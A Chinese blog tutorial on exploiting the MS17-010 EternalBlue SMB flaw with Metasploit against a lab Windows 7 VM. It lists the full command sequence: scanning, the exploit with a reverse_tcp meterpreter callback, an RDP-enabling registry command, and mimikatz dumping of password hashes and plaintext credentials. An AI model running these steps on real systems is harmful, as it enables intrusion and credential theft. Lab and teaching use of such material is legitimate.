MSF之ms17-010永恒之蓝漏洞利用

最新推荐文章于 2024-05-31 07:23:48 发布
最新推荐文章于 2024-05-31 07:23:48 发布
阅读量1.6w 收藏 100
点赞数 27
分类专栏: 渗透 文章标签: MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42280544/article/details/84207905
版权

MSF之ms17-010永恒之蓝漏洞利用

准备

实验准备环境:
被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙)
攻击机:虚拟机kali系统,其IP为:192.168.207.130
攻击工具:kali自带的msfconsole工具

扫描漏洞

在kali终端中输入msfconsole

msf >use auxiliary/scanner/smb/smb_ms17_010(加载扫描exp)
msf >set RHOSTS 10.101.2.11(设置被扫描IP)
msf >run(进行扫描,观察是否存在该漏洞)

在这里插入图片描述

由上图可知,存在MS17-010漏洞

漏洞攻击

use exploit/windows/smb/ms17_010_eternalblue (加载攻击模块)
set RHOST 10.101.2.11(被攻击机IP)
set LHOST 192.168.207.130(设置本地IP)
set LPORT 4444(设置连接端口)
set payload windows/x64/meterpreter/reverse_tcp(配置回链方式)

在这里插入图片描述

show options(查看配置相关信息)
在这里插入图片描述
在这里插入图片描述

meterpreter >exploit(开始攻击)
在这里插入图片描述
攻击成功!

sysinfo爆出系统信息
screenshot截屏,截屏后的图片存放在/root/中

meterpreter >shell,进入靶机cmd
在这里插入图片描述
此时,可以新建文件夹,然后
meterpreter >upload植入已经写好的木马!<此中方法,以后再做>

也可以通过使用msf中的mimikatz,来爆出靶机的用户名和密码,以下是其过程:
首先

netstat -an< 查靶机端口开发情况>
在这里插入图片描述

如果没有开启3389端口,可以使用以下命令再cmd中开启:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

其次

meterpreter > load mimikatz
meterpreter > help
在这里插入图片描述

meterpreter > msv <获取的是hash值>
在这里插入图片描述

meterpreter > ssp <获取的是明文信息>
在这里插入图片描述

meterpreter > wdigest <读取内存中存放的账号密码明文信息>
在这里插入图片描述

meterpreter > kerberos <同widgest类似,我也没有弄清楚,如果大佬知道,还望指点>
在这里插入图片描述

接下来,就是远程登录靶机

rdesktop 10.101.2.11

在这里插入图片描述

成功!

TzerQ
关注
  • 27
    点赞
  • 100
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
专栏目录
MSF使用MS17-010
le31ei的博客
05-16 7466
0x01 环境配置 kali32位(wine32只能在32位下运行) 安装wine32 apt-get install wine32 0x02 使用步骤1、 msfupdate无法更新该插件,所以需要从github下载,命令git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit2、复制到msf的smb目
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝ms17_010)为例
weoptions的博客
09-21 4528
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
渗透32位ms17_010
m0_69240463的博客
03-27 437
在下面的参考链接中具体步骤师傅们写的很详细,我补充一点实际应用过程中还应注意的地方。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
最新发布
dzqxwzoe的博客
05-31 1138
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
msfms17-010永恒之蓝漏洞
AI_SumSky的博客
06-27 6907
**** 1.熟悉msf的基本用法。 2.熟悉一些渗透中会用到基本的windows命令。 3.复现永恒之蓝漏洞。通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。**** 1.打开MSF默认已经集成了MS17-010漏洞的测试模块 利用search语法查找ms17-010 2.探测主机是否存在漏洞,利用use命令选择第三个测试接口,可探查主机是否存在永恒之蓝漏洞
ms12_020(DOS蓝屏攻击)
weixin_66469999的博客
11-08 2182
ms12_020(DOS蓝屏攻击)
cve-2019-0708 msf 执行报错解决
热门推荐
大哥一声吼
12-03 1万+
cve-2019-0708 msf 执行报错解决 在检查服务器是否存在漏洞的过程中,发现exploit 报错, 报错信息如下,已经很明显了 Exploit aborted due to failure: bad-config: Set the most appropriate target manually ,没有正确设置好参数 msf5 exploit(windows/rdp/cve_2...
永恒之蓝配置Windows7
10-24
Windows7 是一种广泛使用的操作系统,但它也存在一些漏洞,例如永恒之蓝漏洞(MS17-010)。本文将讲解如何使用 Kali Linux 中的 MSF-Metasploit 来利用永恒之蓝漏洞入侵 Windows7 系统。 一、准备工作 在开始之前...
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft ...
CVE-2018-2883漏洞利用程序msf
03-27
针对CVE-2018-2883漏洞,Metasploit社区已经开发了一个专门的利用模块,即“msf”模块。通过这个模块,用户可以轻松地对目标系统进行漏洞扫描和利用。具体步骤如下: 1. **配置Metasploit**: 首先确保安装了最新...
红队常用命令
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-11 5379
原文链接。
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4586
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
msf复现永恒之蓝漏洞ms17-010(详解)
m0_72125469的博客
05-18 1419
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
2017-2018-2 20155315《网络对抗技术》Exp2:后门原理与实践
weixin_30311605的博客
03-28 382
实验目的 学习建立一个后门连接。 教程 实验内容 使用netcat获取主机操作Shell,cron启动。 使用socat获取主机操作Shell, 任务计划启动。 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。 ...
记录一次永恒之蓝ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3863
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
ms17-010漏洞复现
10-22
ms17-010漏洞是指微软Windows操作系统中的一个漏洞,黑客可以利用该漏洞远程执行代码,控制受感染的计算机。下面是ms17-010漏洞的复现过程: 1. 使用nmap进行探测,发现开启445端口,该端口可能会存在MS17-010漏洞。 2. 使用MSF永恒之蓝漏洞模块。 3. 使用ms17-010扫描模块,对靶机进行扫描。 4. 使用ms17-010攻击模块,对靶机进行攻击。 5. 得到靶机shell。 6. 通过shell对靶机进行控制。 需要注意的是,复现过程仅供学习和研究使用,请勿用于非法用途。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值